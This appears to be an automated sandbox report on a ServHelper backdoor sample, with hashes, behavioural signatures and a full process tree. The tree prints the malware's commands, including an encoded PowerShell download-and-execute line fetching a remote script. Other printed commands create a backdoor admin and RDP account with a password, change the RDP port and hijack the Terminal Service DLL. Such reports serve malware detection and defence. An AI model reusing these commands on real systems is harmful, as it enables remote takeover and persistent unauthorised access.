Analysis
-
max time kernel
167s -
max time network
188s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
22-09-2021 06:21
Static task
static1
Behavioral task
behavioral1
Sample
61d5e32562d1c70daf0a3112f7888258.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
61d5e32562d1c70daf0a3112f7888258.exe
Resource
win10-en-20210920
General
-
Target
61d5e32562d1c70daf0a3112f7888258.exe
-
Size
5.7MB
-
MD5
61d5e32562d1c70daf0a3112f7888258
-
SHA1
11c54ce99e87637f58c7bc0bd8134c73df9bf879
-
SHA256
da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605
-
SHA512
9cad97c4c71535a2391ad73d13e27748300e3147a3383d4eee85caadb461815f9ee8e9b172e732df16813fa8f5ffdc7115e2740778ebc51c536ab06fc7910cc2
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 10 1320 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 952 icacls.exe 1736 icacls.exe 624 icacls.exe 1756 takeown.exe 1696 icacls.exe 1380 icacls.exe 1368 icacls.exe 1516 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 884 884 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exepid process 1368 icacls.exe 1516 icacls.exe 952 icacls.exe 1736 icacls.exe 624 icacls.exe 1756 takeown.exe 1696 icacls.exe 1380 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 21 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e7fc69aa-b31d-4c73-9aee-74b52a70cad7 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_928e1545-d3f4-42aa-8697-b0076d1abc46 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_141a24d8-449e-4974-94ef-285a988282ab powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_229db460-2302-4054-b1b6-982bb0ef94ae powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9880927e-2494-4d24-a7f8-a6fcdff6762e powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_323d885c-4adc-4743-b9e2-dbff51c78107 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e0d11be0-ee1c-4581-81e7-371b7150ce13 powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ea27df9c-bc90-40c3-8e19-c43c1104e839 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b816317e-70d8-4475-8151-893cd53f43a2 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y3LFTIR59G5681HH3G32.temp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8b05eb37-a2d3-4e6d-94e4-69a5b87b963f powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_74ba2926-1d90-4656-a223-c63556293bb4 powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe -
Modifies data under HKEY_USERS 4 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00945e0d8bafd701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1224 powershell.exe 1224 powershell.exe 1552 powershell.exe 1552 powershell.exe 1808 powershell.exe 1808 powershell.exe 1716 powershell.exe 1716 powershell.exe 1224 powershell.exe 1224 powershell.exe 1224 powershell.exe 1320 powershell.exe 1320 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 468 884 884 884 884 -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 1224 powershell.exe Token: SeDebugPrivilege 1552 powershell.exe Token: SeDebugPrivilege 1808 powershell.exe Token: SeDebugPrivilege 1716 powershell.exe Token: SeRestorePrivilege 1380 icacls.exe Token: SeAssignPrimaryTokenPrivilege 844 WMIC.exe Token: SeIncreaseQuotaPrivilege 844 WMIC.exe Token: SeAuditPrivilege 844 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 844 WMIC.exe Token: SeIncreaseQuotaPrivilege 844 WMIC.exe Token: SeAuditPrivilege 844 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1464 WMIC.exe Token: SeIncreaseQuotaPrivilege 1464 WMIC.exe Token: SeAuditPrivilege 1464 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1464 WMIC.exe Token: SeIncreaseQuotaPrivilege 1464 WMIC.exe Token: SeAuditPrivilege 1464 WMIC.exe Token: SeDebugPrivilege 1320 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
61d5e32562d1c70daf0a3112f7888258.exepowershell.execsc.exenet.execmd.execmd.exedescription pid process target process PID 1840 wrote to memory of 1224 1840 61d5e32562d1c70daf0a3112f7888258.exe powershell.exe PID 1840 wrote to memory of 1224 1840 61d5e32562d1c70daf0a3112f7888258.exe powershell.exe PID 1840 wrote to memory of 1224 1840 61d5e32562d1c70daf0a3112f7888258.exe powershell.exe PID 1224 wrote to memory of 268 1224 powershell.exe csc.exe PID 1224 wrote to memory of 268 1224 powershell.exe csc.exe PID 1224 wrote to memory of 268 1224 powershell.exe csc.exe PID 268 wrote to memory of 760 268 csc.exe cvtres.exe PID 268 wrote to memory of 760 268 csc.exe cvtres.exe PID 268 wrote to memory of 760 268 csc.exe cvtres.exe PID 1224 wrote to memory of 1552 1224 powershell.exe powershell.exe PID 1224 wrote to memory of 1552 1224 powershell.exe powershell.exe PID 1224 wrote to memory of 1552 1224 powershell.exe powershell.exe PID 1224 wrote to memory of 1808 1224 powershell.exe powershell.exe PID 1224 wrote to memory of 1808 1224 powershell.exe powershell.exe PID 1224 wrote to memory of 1808 1224 powershell.exe powershell.exe PID 1224 wrote to memory of 1716 1224 powershell.exe powershell.exe PID 1224 wrote to memory of 1716 1224 powershell.exe powershell.exe PID 1224 wrote to memory of 1716 1224 powershell.exe powershell.exe PID 1224 wrote to memory of 1756 1224 powershell.exe takeown.exe PID 1224 wrote to memory of 1756 1224 powershell.exe takeown.exe PID 1224 wrote to memory of 1756 1224 powershell.exe takeown.exe PID 1224 wrote to memory of 1696 1224 powershell.exe icacls.exe PID 1224 wrote to memory of 1696 1224 powershell.exe icacls.exe PID 1224 wrote to memory of 1696 1224 powershell.exe icacls.exe PID 1224 wrote to memory of 1380 1224 powershell.exe icacls.exe PID 1224 wrote to memory of 1380 1224 powershell.exe icacls.exe PID 1224 wrote to memory of 1380 1224 powershell.exe icacls.exe PID 1224 wrote to memory of 1368 1224 powershell.exe icacls.exe PID 1224 wrote to memory of 1368 1224 powershell.exe icacls.exe PID 1224 wrote to memory of 1368 1224 powershell.exe icacls.exe PID 1224 wrote to memory of 1516 1224 powershell.exe icacls.exe PID 1224 wrote to memory of 1516 1224 powershell.exe icacls.exe PID 1224 wrote to memory of 1516 1224 powershell.exe icacls.exe PID 1224 wrote to memory of 952 1224 powershell.exe icacls.exe PID 1224 wrote to memory of 952 1224 powershell.exe icacls.exe PID 1224 wrote to memory of 952 1224 powershell.exe icacls.exe PID 1224 wrote to memory of 1736 1224 powershell.exe icacls.exe PID 1224 wrote to memory of 1736 1224 powershell.exe icacls.exe PID 1224 wrote to memory of 1736 1224 powershell.exe icacls.exe PID 1224 wrote to memory of 624 1224 powershell.exe icacls.exe PID 1224 wrote to memory of 624 1224 powershell.exe icacls.exe PID 1224 wrote to memory of 624 1224 powershell.exe icacls.exe PID 1224 wrote to memory of 1332 1224 powershell.exe reg.exe PID 1224 wrote to memory of 1332 1224 powershell.exe reg.exe PID 1224 wrote to memory of 1332 1224 powershell.exe reg.exe PID 1224 wrote to memory of 1820 1224 powershell.exe reg.exe PID 1224 wrote to memory of 1820 1224 powershell.exe reg.exe PID 1224 wrote to memory of 1820 1224 powershell.exe reg.exe PID 1224 wrote to memory of 1616 1224 powershell.exe reg.exe PID 1224 wrote to memory of 1616 1224 powershell.exe reg.exe PID 1224 wrote to memory of 1616 1224 powershell.exe reg.exe PID 1224 wrote to memory of 1492 1224 powershell.exe net.exe PID 1224 wrote to memory of 1492 1224 powershell.exe net.exe PID 1224 wrote to memory of 1492 1224 powershell.exe net.exe PID 1492 wrote to memory of 1844 1492 net.exe net1.exe PID 1492 wrote to memory of 1844 1492 net.exe net1.exe PID 1492 wrote to memory of 1844 1492 net.exe net1.exe PID 1224 wrote to memory of 1084 1224 powershell.exe cmd.exe PID 1224 wrote to memory of 1084 1224 powershell.exe cmd.exe PID 1224 wrote to memory of 1084 1224 powershell.exe cmd.exe PID 1084 wrote to memory of 1800 1084 cmd.exe cmd.exe PID 1084 wrote to memory of 1800 1084 cmd.exe cmd.exe PID 1084 wrote to memory of 1800 1084 cmd.exe cmd.exe PID 1800 wrote to memory of 1632 1800 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe"C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\01ximcta\01ximcta.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:268 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES81DB.tmp" "c:\Users\Admin\AppData\Local\Temp\01ximcta\CSC1CD5A0B993214D799C33BD3EA94FE8DB.TMP"4⤵PID:760
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1552 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716 -
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1756 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1696 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1380 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1368 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1516 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:952 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1736 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:624 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1332
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:1820 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1616
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1844
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:1632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1600
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:1984
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:1080
-
C:\Windows\system32\net.exenet start TermService5⤵PID:988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:316
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:1484
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1920
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵PID:1576
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵PID:1020
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:1920
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc lfOn4usP /add1⤵PID:1756
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc lfOn4usP /add2⤵PID:1208
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc lfOn4usP /add3⤵PID:860
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:1516
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:1072
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:456
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD1⤵PID:976
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD2⤵PID:292
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD3⤵PID:788
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:1996
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:368
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1008
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc lfOn4usP1⤵PID:1924
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc lfOn4usP2⤵PID:1808
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc lfOn4usP3⤵PID:820
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:1532
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:844
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:968
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1464
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1572
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:1832
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1320
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0d3ae33b-746f-4323-ba74-bdb028a07a8c
MD52d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_639ab942-c81f-47d4-ac03-65966cfc5380
MD5a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA181dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA5128c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_654a8ace-004d-41ec-aa50-916d4034f062
MD56f0d509e28be1af95ba237d4f43adab4
SHA1c665febe79e435843553bee86a6cea731ce6c5e4
SHA256f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA5128dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6c50b578-02d4-4dc6-be97-f7b6cb578ea7
MD5e5b3ba61c3cf07deda462c9b27eb4166
SHA1b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_786aa4ad-8de6-4b09-9648-184e34d9e2f4
MD57f79b990cb5ed648f9e583fe35527aa7
SHA171b177b48c8bd745ef02c2affad79ca222da7c33
SHA256080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA51220926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8f9e8596-b8dd-41c6-940e-311ae33f2ac3
MD5faa37917b36371249ac9fcf93317bf97
SHA1a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c42c2c11-0ed0-47cd-b39d-ce907cad38ae
MD5d89968acfbd0cd60b51df04860d99896
SHA1b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA2561020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5097dc02256d474be1e33a9ffc66c910b
SHA1aa0d1ead57b57cb7472fec127a9f013e2863ece9
SHA25660eea41c8a20e29efe82cd3b3a252cb3f3ac1477ffe02ed6b912c2f6bcd37ecd
SHA512bd4add82d5cbe9f5c545fcbc402642efac1a90b30dd373fc6b14ece46ad389ad56b7d89dfa97c0f7c9c4a7afa93467c2735cd742dfe9095930649a0ca24e0bed
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD55a773c88f360a9b88e4674ff5f27b147
SHA1248ab57c0259cbdf1ebbcefbb1659a3e132604a4
SHA25699e66670d93c9d83cf2d21b89a1b871a6e67bbcbc2678372c98691f4a4ab821a
SHA5122cb0bb7bba07701f59ce6ff242368719f85c4310da6074d24c81ab2b94f022f7dfffc5fcd0390195b0a27315f5ef98a415702dc57192e3f079ba539005790351
-
MD5
d990115e609be57a826dde95367044ad
SHA1644a4c0e5be849aeea5b39bac10e0a7eebc063b8
SHA256c8adc0962bbd0ab534eb18d0791056bd9adfabd8f638b621c9dc0d8f403d03d3
SHA512706e77cb17f5d03354643ad996944f223d5f78c83dffd5666efd46bd922d15bbe4a668dbdeaef70efba1b0f63da57f38bb4500bcd769591b489ff9c6e26f6c6c
-
MD5
94d14dfed3873526664668b0b2aa023d
SHA12ed962b8f740d481a852519368d0d9d4cfea07b1
SHA2561cebb023058d62c7383e6fd1c865e5197f522a6a09412d3c1beb802b105871ab
SHA512230f221e9c082c2a3b5db10180a69ee837111d2a28324b562602d8d645951c433855a6065f973a5dcb1f0dafe8307dfeb925e28e9546da3bcb5601ea230d893e
-
MD5
9fca6b1768eba2c5d42f189123152e32
SHA1560ec3249af6e8d82e994554475b870d32145352
SHA256c5c7012656bfebd5ba7d4ae8459bd2fcc57ac661e413e2b1da339b9fba86de1f
SHA512b72f2bc28dcde144596eabb62375479c4ddb3b004ac8759ee9523170289f55572784e695a552fd612a5dc5a56f6c76b3baee9831c7cac7123f72b2eb2aadb3f2
-
MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5bd009f8192e4bf5c50d7ff2882d1bbe5
SHA14735a9e2f4a6188ed8d57639b0e0841a36150b83
SHA2562cdd22d384c6c7d7a2ef71db040d83597dd7ea59a7d125e69bae11295300b124
